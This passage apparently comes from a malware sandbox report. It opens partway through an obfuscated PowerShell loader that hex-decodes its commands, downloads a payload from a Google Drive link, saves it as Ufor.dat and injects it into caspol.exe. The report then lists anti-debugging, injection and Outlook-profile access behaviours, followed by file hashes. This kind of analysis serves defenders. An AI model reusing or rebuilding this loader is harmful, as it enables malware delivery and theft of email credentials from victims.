'533F1B13191E44574A57531A121B13593E1901181C125F2C3E19032703052A4D4D2D1205185B5741434E5B57470F444747475B57470F43475E';.($usneavitam7) $Uncon7;$Uncon8 = Jernfo11 '53270518100516454544574A57531A121B13593E1901181C125F2C3E19032703052A4D4D2D1205185B5745424E44424F40455B57470F444747475B57470F435E';.($usneavitam7) $Uncon8;$Jernfo01 = 'https://drive.google.com/uc?export=download&id=1_-w5Me4EvTzbdzIX_v_YMZdeLAzHrV5z';$Jernfo00 = Jernfo11 '53351E1B1B444F574A575F3912005A38151D1214035739120359201215341B1E1219035E59331800191B1816132403051E19105F533D120519111847465E';$Uncon8 = Jernfo11 '533F1B13191E454A531219014D16070713160316';.($usneavitam7) $Uncon8;$Hldni2=$Hldni2+'\Ufor.dat';$Bill38='';if (-not(Test-Path $Hldni2)) {while ($Bill38 -eq '') {.($usneavitam7) $Jernfo00;Start-Sleep 5;}Set-Content $Hldni2 $Bill38;}$Bill38 = Get-Content $Hldni2;$Uncon9 = Jernfo11 '532219141819574A572C240E0403121A59341819011205032A4D4D3105181A3516041241432403051E19105F53351E1B1B444F5E';.($usneavitam7) $Uncon9;$Bill380 = Jernfo11 '2C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D3418070E5F5322191418195B57475B5757533F1B13191E445B5741434E5E';.($usneavitam7) $Bill380;$Skdeskind=$Uncon.count-649;$Bill381 = Jernfo11 '2C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D3418070E5F5322191418195B5741434E5B57532705181005164545445B5753241C1312041C1E19135E';.($usneavitam7) $Bill381;$Bill382 = Jernfo11 '532401011203041E1A574A572C240E0403121A59250219031E1A12593E190312051807241205011E141204593A1605041F161B2A4D4D30120333121B121016031231180531021914031E181927181E190312055F5F111C07575302131C1B1E0704151857533C1E13131E1C125E5B575F30332357375F2C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5B572C3E19032703052A5E575F2C3E19032703052A5E5E5E';.($usneavitam7) $Bill382;$Bill383 = Jernfo11 '532401011203041E1A593E1901181C125F533F1B13191E445B532705181005164545445B53331E0407020316030445464E5B475B475E';.($usneavitam7) $Bill383#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:268
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5fc4666cbca561e864e7fdf883a9e6661
SHA12f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA25610f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c55caa3760ab99c7031818dbe34c1015
SHA1130a87a6ba6bc188725e3c7404c8d7b7b3da3e73
SHA2567a88d90e7d2acf45428a46d2064ca58e4cd4ea4056feb442868a8edb2e091a12
SHA512563795ef730382bfc40d5596475da9b6a9e72db3ebe975fe156b81ceac569058e52249bc4fb9569924e52413914f999d972781c8776e825bb39c44e761d7432a